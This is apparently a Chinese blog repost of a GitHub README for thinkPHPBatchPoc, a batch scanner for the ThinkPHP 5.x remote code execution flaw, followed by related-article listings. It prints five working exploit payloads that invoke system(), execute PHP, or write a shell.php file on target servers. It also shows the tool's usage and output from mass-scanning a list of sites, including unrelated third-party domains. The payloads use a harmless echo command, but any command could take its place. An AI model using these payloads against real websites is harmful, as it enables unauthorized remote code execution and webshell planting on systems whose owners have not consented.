php batch,GitHub - admintony/thinkPHPBatchPoc: thinkPHP代码执行批量检测工具

最新推荐文章于 2023-07-12 13:28:43 发布
最新推荐文章于 2023-07-12 13:28:43 发布
阅读量270 收藏
点赞数
文章标签: php batch

thinkPHPBatchPoc

thinkPHPBatchPoc 是thinkPHP代码执行批量检测工具

工具所使用的payload

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com

?s=index/\think\Request/input&filter=system&data=echo%20www_admintony_com

?s=index/\think\view\driver\Php/display&content=%3C?php%20echo%20www_admintony_com;?%3E

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20echo%20"www_admintony_com";?%3E

工具使用方法

PS E:\PyProject> python .\thinkPHPBatchPoc.py

thinkPHPBatchPoc

Author: Admintony @ 2018.12.13

Blog: http://www.admintony.com

免责声明: 脚本仅用于批量检测站点是否存在漏洞,请勿用于非法用途,否则作者不担负任何责任。

usage:

thinkPHPBatchPoc.py -f target.txt # 批量检测是否存在thinkPHP代码执行漏洞

thinkPHPBatchPoc.py -u target_URL # 指定检测是否存在thinkPHP代码执行漏洞

针对单个目标进行测试

PS E:\PyProject> python .\thinkPHPBatchPoc.py -u admintony.com

[+] http://admintony.com is vulnerable

[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com

批量测试

PS E:\PyProject> python .\thinkPHPBatchPoc.py -f .\target.txt

[+]Testing http://www.admintony.com

[-] http://www.admintony.com is not vulnerable

[+]Testing http://baidu.com

[-] http://baidu.com is not vulnerable

[+]Testing vulW3b.admintony.com/

[+] http://vulW3b.admintony.com/ is vulnerable

[+] Payload is ?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20www_admintony_com

博客地址

李奇诺
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
shell实例手册
yonggeit的博客
05-27 5980
shell实例手册 1文件{ touch file # 创建空白文件 rm -rf 目录名 # 不提示删除非空目录(-r:递归删除 -f强制) dos2unix # windows文本转linux文本 unix2dos # linux文本转windows文本 enca filename ...
TPLogScan:ThinkPHP全日志扫描工具,命令行版和BurpSuite插件版
05-29
ThinkPHP3和5日志扫描工具,提供命令行版和BurpSuite插件版,尽可能全的发掘网站日志信息 命令行版 安装 git clone https://github.com/r3change/TPLogScan.git cd TPLogScan/ pip install -r requirements.txt 使用 > python3 TPLogScan.py -h usage: TPLogScan.py [-h] [-u URL] [-v {3,5}] [-p PATH] [-y YEAR] [-m MONTH] [-d DAY] Thinkphp 3 or 5 log file scan! optional arguments: -h, --help show this help message and exit
thinkphp 远程代码执行漏洞poc
12-11
漏洞影响范围:v5.x < 5.1.31,<= 5.0.23 可以利用poc直接检测目标网站是否存在漏洞
thinkphp 一键漏洞检测
12-09
thinkphp 一键漏洞检测,V3.2.0~V5.1.23,都可进行测试
sql注入检测工具类_TPscan一键ThinkPHP漏洞检测工具
weixin_34378978的博客
01-27 2546
1.简要描述这个工具写完有一段时间了,看网上目前还没有一个thinkphp的漏洞集成检测工具,所以打算开源出来。2.代码结构插件化思想,所有的检测插件都在plugins目录里,TPscan.py主文件负责集中调度。插件目录:ThinkPHP 用户模块checkcode SQL注入漏洞ThinkPHP 5.0.23远程代码执行ThinkPHP 5.0.23 Debug模式远程代码执行Thi...
Thinkphp批量更新数据的方法汇总
王世凡的技术博客
04-20 2327
以下小编给大家列出了三种实现thinkphp批量更新数据的方法,写的不好还请见谅,有意见欢迎提出,共同学习进步! //批量修改 data二维数组 field关键字段 参考ci 批量修改函数 传参方式 function batch_update($table_name='',$data=array(),$field=''){ if(!$table_name||!$data||!$field){ return false; }else{ $sql='UPDATE '.$table_name; } $con=
php开源ocr,GitHub - thinkphpdev/PaddleOCR: 基于飞桨的OCR工具库,包含总模型仅8.6M的超轻量级中文OCR,单模型支持中英文数字组合识别、竖排文本识别、长文本识...
weixin_30183847的博客
03-29 1079
简介PaddleOCR旨在打造一套丰富、领先、且实用的OCR工具库,助力使用者训练出更好的模型,并应用落地。近期更新2020.5.30,模型预测、训练支持Windows系统,识别结果的显示进行了优化2020.5.30,开源通用中文OCR模型2020.5.30,提供超轻量级中文OCR在线体验特性超轻量级中文OCR,总模型仅8.6M单模型支持中英文数字组合识别、竖排文本识别、长文本识别检测模型DB(4...
web3php,sc0Vu/web3.php
weixin_35759015的博客
03-12 1245
web3.phpA php interface for interacting with the Ethereum blockchain and ecosystem.InstallSet minimum stability to dev"minimum-stability": "dev"Thencomposer require sc0vu/web3.php dev-masterOr you can...
Golang优秀开源项目汇总, 10大流行Go语言开源项目, golang 开源项目全集(golang/go/wiki/Projects), GitHub上优秀的Go开源项目...
weixin_34245082的博客
05-08 6074
  Golang优秀开源项目汇总(持续更新。。。)我把这个汇总放在github上了, 后面更新也会在github上更新。 https://github.com/hackstoic/golang-open-source-projects  。 欢迎fork, star , watch, 提issue。    资料参考来源:http://studygolang.com/projects 监控...
ThinkPHP框架漏洞总结
weixin_42345596的博客
08-25 3860
Thinkphp简介 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的,是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,遵循Apache2开源协议发布,从Struts结构移植过来并做了改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。 ThinkPHP可以支持windows/U
Getshell 网站漏洞批量检测工具破解后使用教程
07-26
Getshell网站漏洞批量检测工具破解后使用教程,运行软件,等待大概 3分钟左右软件才会启动。
Thinkphp常见漏洞总结
最新发布
weixin_46622976的博客
07-12 5880
ThinkPHP漏洞整理
thinkphp实现某字段的批量查询
weixin_39218464的博客
05-18 781
批量查询条件: 按订单号,输入数据用换行隔开,如 982669059853889013 982653954214187509 1、根据换行符将前端传递的字符串转成数组 2、根据模糊查询组装查询条件 查询sql SELECT * FROM rht_medicine_order WHERE order_sn LIKE ‘%001111%’ OR order_sn LIKE ‘%202003041713%’ OR order_sn LIKE ‘%202003041714%’ //接收前端传递值 $order_s
基于JavaFx的ThinkPHP漏洞扫描工具---RexHa(Aazhen)的一些说明
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-18 7142
基于JavaFx的Thinkphp漏洞扫描工具Rexha的一些使用说明。支持多种payload。多线程并发批量扫描。支持漏洞类型包括:ThinkPHP-2.x-RCE",ThinkPHP-5.0.23-RCE","ThinkPHP5.0.x-5.0.23通杀RCE","ThinkPHP5-SQL注入&敏感信息泄露","ThinkPHP 3.x 日志泄露NO.1","ThinkPHP 3.x 日志泄露NO.2","ThinkPHP 5.x 数据库信息泄露"。
tp5 批量更新多条记录_Thinkphp怎么批量更新数据
weixin_39770311的博客
12-21 4873
展开全部||thinkphp批量更新数据可以参考如下三种方法:方法一://批量修改 data二维数组 field关键字段62616964757a686964616fe59b9ee7ad9431333361323564 参考ci 批量修改函数 传参方式function batch_update($table_name='',$data=array(),$field=''){if(!$table_na...
ThinkPHP3.1笔记--批量操作
DekingChen
10-24 2234
Thinkphp批量操作代码
thinkphp框架的函数使用难点总结
tjj_955的博客
12-29 492
注:本人写这篇文章的原因就是因为这两种数据的返回格式不同,导致我在前台的数据遍历是一直出错,由于没有经验,历经了千难万苦才找到这个原因。 1.数据库的两种查询方式返回的数据类型不同。 1.1 $document = new Document();$info = $document-&gt;where($map)-&gt;select();     $info = Db::name('doc...
ThinkPHP 5.x远程命令执行漏洞复现
WY92139010的博客
09-23 699
ThinkPHP 5.x远程命令执行漏洞复现 一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 ...
ThinkPHP 漏洞检测
weixin_45439698的博客
08-19 1973
0x00 前言 由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 0x01 影响范围 5.x < 5.1.31, <= 5.0.23 0x02 漏洞分析 Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/com...
batch-scheduler部署教程:从源码到运行
你可以通过使用Git命令从GitHub仓库克隆batch-scheduler的源代码: ``` git clone https://github.com/asofdate/batch-scheduler.git ``` 2. Maven编译与依赖下载 进入下载的代码目录,使用Maven进行编译。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值